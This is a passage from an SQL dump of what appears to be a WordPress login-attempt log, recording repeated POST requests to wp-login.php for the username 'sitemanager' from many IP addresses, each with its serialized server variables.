00:00:00'),(94603,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"27768\";s:11:\"REMOTE_ADDR\";s:13:\"192.34.56.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746038558.4521749;s:12:\"REQUEST_TIME\";i:1746038558;}}','192.34.56.148',0,'2025-05-01 00:12:40','1970-01-01 00:00:00'),(94604,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40312\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.123.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746038879.015933;s:12:\"REQUEST_TIME\";i:1746038879;}}','68.65.123.234',0,'2025-05-01 00:18:01','1970-01-01 00:00:00'),(94605,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52326\";s:11:\"REMOTE_ADDR\";s:13:\"160.25.166.79\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746039201.6078;s:12:\"REQUEST_TIME\";i:1746039201;}}','160.25.166.79',0,'2025-05-01 00:23:23','1970-01-01 00:00:00'),(94606,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44336\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.141.222\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746039525.3031459;s:12:\"REQUEST_TIME\";i:1746039525;}}','66.29.141.222',0,'2025-05-01 00:28:47','1970-01-01 00:00:00'),(94607,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60030\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.141.222\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746039851.298003;s:12:\"REQUEST_TIME\";i:1746039851;}}','66.29.141.222',0,'2025-05-01 00:34:12','1970-01-01 00:00:00'),(94608,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"8902\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746040173.6421709;s:12:\"REQUEST_TIME\";i:1746040173;}}','91.151.95.70',0,'2025-05-01 00:39:35','1970-01-01 00:00:00'),(94609,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60342\";s:11:\"REMOTE_ADDR\";s:12:\"66.85.157.26\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746040486.8028729;s:12:\"REQUEST_TIME\";i:1746040486;}}','66.85.157.26',0,'2025-05-01 00:44:48','1970-01-01 00:00:00'),(94610,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33994\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746040805.6175399;s:12:\"REQUEST_TIME\";i:1746040805;}}','51.178.81.248',0,'2025-05-01 00:50:07','1970-01-01 00:00:00'),(94611,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51930\";s:11:\"REMOTE_ADDR\";s:14:\"199.188.207.22\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746041120.845942;s:12:\"REQUEST_TIME\";i:1746041120;}}','199.188.207.22',0,'2025-05-01 00:55:22','1970-01-01 00:00:00'),(94612,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59812\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746041433.5653629;s:12:\"REQUEST_TIME\";i:1746041433;}}','45.67.14.64',0,'2025-05-01 01:00:35','1970-01-01 00:00:00'),(94613,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53726\";s:11:\"REMOTE_ADDR\";s:14:\"164.90.225.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s: